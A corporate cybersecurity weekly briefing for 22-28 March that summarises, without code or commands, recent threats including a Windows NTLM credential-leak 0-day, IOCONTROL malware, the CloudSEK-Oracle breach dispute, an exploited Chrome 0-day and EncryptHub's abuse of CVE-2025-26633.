Hybrid Cloud
Cyber Security & NaaS
AI & Data
IoT & Connectivity
Business Applications
Intelligent Workplace
Consulting & Professional Services
Small Medium Enterprise
Health and Social Care
Industry
Retail
Tourism and Leisure
Transport & Logistics
Energy & Utilities
Cyber Security Weekly Briefing, 22-28 March
New 0-day vulnerability in Windows exposes NTLM credentials
A new 0-day vulnerability in Windows, discovered by 0patch and detailed in their blog, allows attackers to steal NTLM credentials by tricking users into viewing malicious .scf files in Windows Explorer. This flaw affects everything from Windows 7 and Server 2008 R2 to the most recent versions, such as Windows 11 v24H2 and Server 2025, and does not yet have a CVE identifier.
Although Microsoft has not issued an official patch, 0patch has developed free micro-patches that are applied automatically without the need to reboot, even on obsolete systems. This vulnerability is in addition to other recent NTLM-related vulnerabilities that Microsoft has classified as “won't fix”; that is, vulnerabilities that it will not correct by its own decision, either because of their low impact, complexity or because they affect unsupported versions.
Therefore, users are advised to consider third-party solutions such as 0patch to protect their systems, especially if they are using unsupported versions, or to disable vulnerable functions if possible.
IOCONTROL: New malware targeting critical infrastructures
Flashpoint researchers have identified a new malware attributed to the pro-Iranian hacktivist group Cyber Av3ngers. IOCONTROL, designed to attack IoT and OT systems, has been detected in attacks against fuel management infrastructures in the US and Israel. Specifically, this malware uses advanced techniques to evade analysis, including packaging with modified UPX and AES-256 encryption to hide its C2 domain.
Once deployed, it establishes persistence on the system, collects information and maintains communication with its control server via the MQTT protocol. In addition, Flashpoint researchers have identified an alleged developer offering IOCONTROL in underground forums, which could encourage its proliferation in future attacks. Given its sophistication, organizations are advised to strengthen their security measures in industrial environments.
Alleged data breach: CloudSEK responds with new evidence following Oracle statements
Currently, CloudSEK and Oracle are embroiled in a controversy regarding an alleged data breach of Oracle's cloud infrastructure. Initially, CloudSEK identified that a malicious actor, known as "rose87168," claimed to have compromised an Oracle single sign-on (SSO) endpoint, gaining access to 6 million records including SSO and LDAP credentials, OAuth2 keys and customer information.
Oracle responded by categorically denying any security breach, assuring that the disclosed credentials were not associated with Oracle Cloud and that no customers were affected. However, CloudSEK presented additional evidence that they say confirms the intrusion and highlights the need for transparency and collaboration in cybersecurity. Their researchers traced the attacker's activity to a compromised production endpoint (login.us2.oraclecloud.com) used to authenticate API requests using OAuth2 tokens.
In addition, CloudSEK verified that several domains provided by the attacker corresponded to real Oracle Cloud customers.
Fixed an actively exploited 0-day flaw in Chrome
Google has fixed a high-severity 0-day flaw in Chrome, which has been actively exploited by malicious actors in espionage attacks. Google fixed the bug for Stable Desktop channel users, and patched versions were distributed worldwide to Windows users (134.0.6998.178). Separately, Kaspersky researchers described the vulnerability as incorrect handling provided in unspecified circumstances in Mojo on Windows.
The flaw is being used in phishing attacks as part of a cyber-espionage campaign targeting Russian organizations and dubbed Operation ForumTroll. The campaign specifically targets the country's media, educational institutions and government organizations. The attackers use exploits CVE-2025-2783 to bypass Chrome sandbox protections and infect targets with sophisticated malware. A second exploit was also used that allowed remote code execution on compromised systems.
However, patching Chrome would disable the entire exploit chain, blocking potential attacks.
EncryptHub leverages CVE-2025-26633 in its attacks
A Trend Micro report reveals that threat actor EncryptHub, also known as Larva-208 or Water Gamayun, has been exploiting CVE-2025-26633 (CVSSv3 of 7.0 according to Microsoft), a 0-day vulnerability that bypasses security features in the Microsoft Management Console, in its attacks.
EncryptHub has developed a technique to exploit the vulnerability, which Trend Micro has dubbed MSC EvilTwin, which involves manipulating .msc files and the Multilingual User Interface path (MUIPath) to download and execute malicious payloads because the user is not warned before unexpected MSC files are loaded on unpatched devices. In the attacks, EncryptHub used several malware families, such as the SilentPrism backdoor or the Stealc and Rhadamanthys infostealers.
◾ This newsletter is one of the deliverables of our Operational and Strategic Intelligence service. If you are interested in knowing the rest of the Operational and Strategic Intelligence contents included in the service, please contact us →
